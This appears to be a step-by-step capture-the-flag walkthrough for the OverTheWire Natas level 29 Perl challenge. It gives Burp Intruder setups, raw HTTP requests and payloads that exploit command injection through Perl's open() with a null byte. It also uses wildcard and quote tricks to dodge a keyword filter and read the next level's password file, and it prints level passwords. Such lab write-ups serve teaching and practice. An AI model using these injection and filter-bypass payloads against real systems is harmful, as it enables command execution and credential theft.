PASSWORD: 31F4j3Qi2PnuhIZQokxXk1L3QT9Cppns

URL: http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground  <----------PARAMETER
 H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

                    $$$$$$$$$   $$$$$$$$$$$     $$$$$$$$$     $$$$                            
                   $$$$$$$$$$$   $$$$$$$$$$$   $$$$$$$$$$$    $$$$                            
                   $$$$    $$$$         $$$$   $$$$    $$$$   $$$$                            
                   $$$$    $$$$         $$$$   $$$$    $$$$   $$$$                            
                   $$$$    $$$$     $$$$$$$    $$$$    $$$$   $$$$                            
                   $$$$$$$$$$$      $$$$$$$    $$$$$$$$$$$    $$$$                            
                   $$$$$$$$$$           $$$$   $$$$$$$$$$     $$$$                            
                   $$$$                 $$$$   $$$$  $$$$     $$$$                            
                   $$$$          $$$$$$$$$$$   $$$$   $$$$    $$$$$$$$$$$                     
                   $$$$         $$$$$$$$$$$    $$$$    $$$$    $$$$$$$$$$$            
                 
                                                                            
          $$$$     $$$$   $$$$      $$$$   $$$$$$$$$$   $$$$$$$$$$$     $$$$$$$$$$            
          $$$$     $$$$   $$$$$     $$$$   $$$$$$$$$$$   $$$$$$$$$$$   $$$$$$$$$$$$           
          $$$$     $$$$   $$$$$$    $$$$   $$$$    $$$$         $$$$   $$$$     $$$$          
          $$$$     $$$$   $$$$$$$   $$$$   $$$$    $$$$         $$$$   $$$$     $$$$          
          $$$$     $$$$   $$$$ $$$  $$$$   $$$$    $$$$     $$$$$$$    $$$$     $$$$          
          $$$$     $$$$   $$$$  $$$ $$$$   $$$$    $$$$     $$$$$$$    $$$$$$$$$$$$           
          $$$$     $$$$   $$$$   $$$$$$$   $$$$    $$$$         $$$$   $$$$$$$$$$$            
          $$$$     $$$$   $$$$    $$$$$$   $$$$    $$$$         $$$$   $$$$   $$$$            
          $$$$$$$$$$$$$   $$$$     $$$$$   $$$$$$$$$$$   $$$$$$$$$$$   $$$$    $$$$           
           $$$$$$$$$$$    $$$$      $$$$   $$$$$$$$$$   $$$$$$$$$$$    $$$$     $$$$

         
  $$$$$$$$$     $$$$$$$$$$      $$$$$$$$$$$    $$$$     $$$$   $$$$      $$$$   $$$$$$$$$$$
 $$$$$$$$$$$   $$$$$$$$$$$$    $$$$$$$$$$$$$   $$$$     $$$$   $$$$$     $$$$   $$$$$$$$$$$$
 $$$$   $$$$   $$$$     $$$$   $$$$     $$$$   $$$$     $$$$   $$$$$$    $$$$   $$$$     $$$$
 $$$$   $$$$   $$$$     $$$$   $$$$     $$$$   $$$$     $$$$   $$$$$$$   $$$$   $$$$     $$$$
 $$$$          $$$$     $$$$   $$$$     $$$$   $$$$     $$$$   $$$$ $$$  $$$$   $$$$     $$$$
 $$$$  $$$     $$$$$$$$$$$$    $$$$     $$$$   $$$$     $$$$   $$$$  $$$ $$$$   $$$$     $$$$
 $$$$   $$$$   $$$$$$$$$$$     $$$$     $$$$   $$$$     $$$$   $$$$   $$$$$$$   $$$$     $$$$
 $$$$   $$$$   $$$$   $$$$     $$$$     $$$$   $$$$     $$$$   $$$$    $$$$$$   $$$$     $$$$
 $$$$$$$$$$    $$$$    $$$$    $$$$$$$$$$$$$   $$$$$$$$$$$$$   $$$$     $$$$$   $$$$$$$$$$$$
  $$$$$$$$     $$$$     $$$$    $$$$$$$$$$$     $$$$$$$$$$$    $$$$      $$$$   $$$$$$$$$$$ 

*BURP SUITE*
*TOGGLE PROXY*
*HTTP HISTORY*
/index.pl?file=perl+underground
*SEND TO INTRUDER*
*CLEAR$*
*REPLACE FILE AND ADD$ A CHARACTER*
GET /index.pl?file=§a§ HTTP/1.1
Host: natas29.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic bmF0YXMyOTozMUY0ajNRaTJQbnVoSVpRb2t4WGsxTDNRVDlDcHBucw==
Connection: close
Referer: http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground+2
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

*WEB BROWSER GITHUB SEARCH: SECLISTS*
URL: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case.txt
*FOR ALPHANUMERIC VALUES*
*COPY RAW FILE

*TOGGLE PAYLOADS
*PAYLOAD SET 1
*PAYLOAD TYPE SIMPLE LIST
*PAYLOAD SETTINGS
*PRESS CLEAR
*PRESS PASTE - RAW FILE - FOR ALPHANUMERIC VALUES*
*START ATTACK*

*PRESS LENGTH FOR THE SHORTEST OUTPOST
0 HAS THE SHORTEST OUTPOST - THE RESPONSE DOES NOT HAVE A <PRE>

# Perl command injection
# open() function is vulnerable and can be used to execute commands
# ex : “| shutdown -r |

*INTRUDER*
GET /index.pl?file=|§a§| HTTP/1.1  <---------ADD PIPES FOR PERL COMMAND INJECTION
Host: natas29.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic bmF0YXMyOTozMUY0ajNRaTJQbnVoSVpRb2t4WGsxTDNRVDlDcHBucw==
Connection: close
Referer: http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground+2
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

*WEB BROWSER GITHUB SEARCH: FUZZDB*
URL: https://github.com/Tounsi007/fuzzdb-project/blob/master/attack/os-cmd-execution/useful-commands-unix.txt
*FOR OS COMMAND EXECUTION - USEFUL COMMANDS UNIX.TXT*
*COPY RAW FILE

*TOGGLE PAYLOADS
*PAYLOAD SET 1
*PAYLOAD TYPE SIMPLE LIST
*PAYLOAD SETTINGS
*PRESS CLEAR
*PRESS PASTE - RAW FILE - FOR OS COMMAND EXECUTION - USEFUL COMMANDS UNIX.TXT*
*START ATTACK*

***NO OUTPUT RECIEVED****

*INTRUDER*
GET /index.pl?file=|§a§0 HTTP/1.1  <----------CHANGE THE SECOND PIPE INTO A 0
Host: natas29.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic bmF0YXMyOTozMUY0ajNRaTJQbnVoSVpRb2t4WGsxTDNRVDlDcHBucw==
Connection: close
Referer: http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground+2
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

***NO OUTPUT RECIEVED***

*INTRUDER*
GET /index.pl?file=|§a§%00 HTTP/1.1  <----------CHANGE THE SECOND PIPE INTO A NULL CHARACTER %00
Host: natas29.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic bmF0YXMyOTozMUY0ajNRaTJQbnVoSVpRb2t4WGsxTDNRVDlDcHBucw==
Connection: close
Referer: http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground+2
Cookie: _ga_RD0K2239G0=GS1.1.1718037651.6.0.1718037651.0.0.0; _ga=GA1.1.54566035.1717921097
Upgrade-Insecure-Requests: 1

*RESOURCE POOL = 1

HTTP/1.1 200 OK
Date: Sat, 15 Jun 2024 00:41:21 GMT
Server: Apache/2.4.58 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1676
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas29", "pass": "31F4j3Qi2PnuhIZQokxXk1L3QT9Cppns" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">

<style>

#content {
    width: 1000px;
}
pre{
    background-color: #000000; 
    color: #00FF00; 
} 

</style>

<h1>natas29</h1>
<div id="content">
H3y K1dZ,<br>
y0 rEm3mB3rz p3Rl rit3?<br>
\/\/4Nn4 g0 olD5kewL? R3aD Up!<br><br>

<form action="index.pl" method="GET">
<select name="file" onchange="this.form.submit()">
  <option value="">s3lEcT suMp1n!</option>
  <option value="perl underground">perl underground</option>
  <option value="perl underground 2">perl underground 2</option>
  <option value="perl underground 3">perl underground 3</option>
  <option value="perl underground 4">perl underground 4</option>
  <option value="perl underground 5">perl underground 5</option>
</select>
</form>

natas29
<pre></pre><div id="viewsource">c4n Y0 h4z s4uc3?</div>
</div>
</body>
</html>
*COMMANDS ARE BEING REFLECTED BACK*

*WEB BROWSER*
URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|whoami%00
H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

natas29 

URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/natas_webpass/natas30%00
H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

meeeeeep!

URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|ls%00
 H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

c4n Y0 h4z s4uc3?
index.pl perl underground 2.txt perl underground 3.txt perl underground 4.txt perl underground 5.txt perl underground.txt 

URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20index.pl%00
 H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

#!/usr/bin/perl use CGI qw(:standard); print <
natas29
END # # morla /10111 # '$_=qw/ljttft3dvu{/,s/./print chr ord($&)-1/eg' # # credits for the previous level go to whoever # created insomnihack2016/fridginator, where i stole the idea from. # that was a fun challenge, Thanks! # print < y0 rEm3mB3rz p3Rl rit3?
\\/\\/4Nn4 g0 olD5kewL? R3aD Up!

END if(param('file')){ $f=param('file'); if($f=~/natas/){ print "meeeeeep!  <---------NATAS CAN NOT BE USED IN PARAMETER FILE
"; } else{ open(FD, "$f.txt"); print "

";
        while (){
            print CGI::escapeHTML($_);
        }
        print "

"; } } print <c4n Y0 h4z s4uc3?

*USE WILD  CHARACTERS (*) IN URL
*URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/*_webpass/*30%00
 H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

c4n Y0 h4z s4uc3?
WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH

*URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/na??s_webpass/na??s30%00
 H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

c4n Y0 h4z s4uc3?
WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH 

*QUOTATIONS*
URL: http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/%22nata%22s_webpass/%22nata%22s30%00
 H3y K1dZ,
y0 rEm3mB3rz p3Rl rit3?
\/\/4Nn4 g0 olD5kewL? R3aD Up!

c4n Y0 h4z s4uc3?
WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH
